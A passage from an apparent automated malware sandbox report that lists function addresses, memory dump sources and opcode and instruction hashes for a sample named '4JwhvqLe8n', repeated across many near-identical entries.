                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 07c80f366c9e708be5f88d6d89cf683c2d416466354dedf7765eb4a2492a2750
                                                                  • Instruction ID: c903f80ca669c1afc00443ee636d1640197b0a82a322bb41a1c8637baa7919a8
                                                                  • Opcode Fuzzy Hash: 07c80f366c9e708be5f88d6d89cf683c2d416466354dedf7765eb4a2492a2750
                                                                  • Instruction Fuzzy Hash: A5F168A1C082949BF7208724DC45BEB7B78EF91310F1481FAD84D66281D27D5FC68B6B
                                                                  Function 0040B08B Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 440COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 94ed5eeef712c6a959259cb5b8f5391f19ea3f9fbe821ad42c6fc3ab5eb4821c
                                                                  • Instruction ID: b8acdf7308d6b49c1c337050b9d19dbe257c8f1b3eae7aa5982e5ef740dbfe66
                                                                  • Opcode Fuzzy Hash: 94ed5eeef712c6a959259cb5b8f5391f19ea3f9fbe821ad42c6fc3ab5eb4821c
                                                                  • Instruction Fuzzy Hash: 07F167A1C082949BF7208724DC85BEB7B79EF91310F1481FAD84D66281D27D4FC68B6B
                                                                  Function 0040B095 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 436COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 6a2376788be7d587bcce8522af57323231a1ddc1010331dc67254713da04be75
                                                                  • Instruction ID: faa1a34d37298e59c9a25781ba2a3a4b68259adcb83db6b2e4dbd1f49f2a147f
                                                                  • Opcode Fuzzy Hash: 6a2376788be7d587bcce8522af57323231a1ddc1010331dc67254713da04be75
                                                                  • Instruction Fuzzy Hash: 14E166A1C082949BF7208724DC85BEB7B79EF81310F1481FAD84D66281D27D4FC68B6B
                                                                  Function 0040B035 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 429COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: d4626beada52873239c78c176c9c59c8ac6ecb2f3b2d49b7e3e685c3a31f536b
                                                                  • Instruction ID: 20942be26a0bb1574d21cdffcfd82772a50fcfd8e16b7139ac4f6ebf2c59fc95
                                                                  • Opcode Fuzzy Hash: d4626beada52873239c78c176c9c59c8ac6ecb2f3b2d49b7e3e685c3a31f536b
                                                                  • Instruction Fuzzy Hash: D7E158A1D082949BF7218724DC857EB7B78EF91310F1481FAD84D66281D27D4FC68B6B
                                                                  Function 0040B335 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 421COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: e10496b6a8ecc01e288818880832c162771d721495a16ba513804ab57015e00d
                                                                  • Instruction ID: 01bf1487118900520c2c4ee157e84824dabc5311628179446bcc3d50be1815b7
                                                                  • Opcode Fuzzy Hash: e10496b6a8ecc01e288818880832c162771d721495a16ba513804ab57015e00d
                                                                  • Instruction Fuzzy Hash: DDE168A1C082949BF7218624DC85BEB7B78EF81310F1481FAD84D66281D27D5FC68B6B
                                                                  Function 0040B0D9 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 417COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 94de6cb43ca6aa13e67ae836f7b547946d3dd5ec193af8d95458265d84d62e4c
                                                                  • Instruction ID: 849cf98f0d9e8883edd505fd289fa4cf39ab600865f398a2a22228110a8db3d5
                                                                  • Opcode Fuzzy Hash: 94de6cb43ca6aa13e67ae836f7b547946d3dd5ec193af8d95458265d84d62e4c
                                                                  • Instruction Fuzzy Hash: 36E157A1C082949BF7218624DC85BEB7B79EF91310F1481FAD84D66281D27D4FC68B6B
                                                                  Function 0040B342 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 416COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 4da81adb6ff54874ead631ba1653ea22455dc19add6efa080493e4757366d41a
                                                                  • Instruction ID: 5db5ed6562b64ea0462ee99b5b7c6444358f02f3e63aec1b00d977781b5c55bf
                                                                  • Opcode Fuzzy Hash: 4da81adb6ff54874ead631ba1653ea22455dc19add6efa080493e4757366d41a
                                                                  • Instruction Fuzzy Hash: 82E167A1D082949BF7218724DC85BEB7B78EF91310F1481FAD84D66281D27D0FC68B6B
                                                                  Function 0040B401 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 405COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: e38a752faa68d8b8616b1ef710dbf80f13c412000fa0c22030b5ff9bca409c90
                                                                  • Instruction ID: 7a26878e1429824609114e8566e6b795f961bb7ace041d1e6cb9dac7be62f7eb
                                                                  • Opcode Fuzzy Hash: e38a752faa68d8b8616b1ef710dbf80f13c412000fa0c22030b5ff9bca409c90
                                                                  • Instruction Fuzzy Hash: B9E166A1C082949BF7218724DC85BEB7B79EF91310F1481FAD44D66281D27E1FC68BA7
                                                                  Function 0040B410 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 402COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 6ad0aa7d12710ac61065b9be4e23e77e37743bc97611adc3db16428c67dd83ac
                                                                  • Instruction ID: 70a33bfecfa557418bc060e572197bcbb6dc652cbf25d6133d418ddf569241ff
                                                                  • Opcode Fuzzy Hash: 6ad0aa7d12710ac61065b9be4e23e77e37743bc97611adc3db16428c67dd83ac
                                                                  • Instruction Fuzzy Hash: 2CE155A1D082949BF7218724DC85BEB7B79EF81310F1481FAD44D66281D27E1FC68B67
                                                                  Function 0040B41F Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 401COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 46bc8d4a4d3fca283f349a44071f52bd7a29a6439f1e4d7e66f3be0d53cb4c70
                                                                  • Instruction ID: d4274db13835bcdff87d680cf6ecabf6aba49fd63204c7bd4018fda4a7829106
                                                                  • Opcode Fuzzy Hash: 46bc8d4a4d3fca283f349a44071f52bd7a29a6439f1e4d7e66f3be0d53cb4c70
                                                                  • Instruction Fuzzy Hash: D0E155A1D082949BF7218624DC85BEB7B79EF91310F1481FAD84D66281D27E0FC6CB67
                                                                  Function 0040B459 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
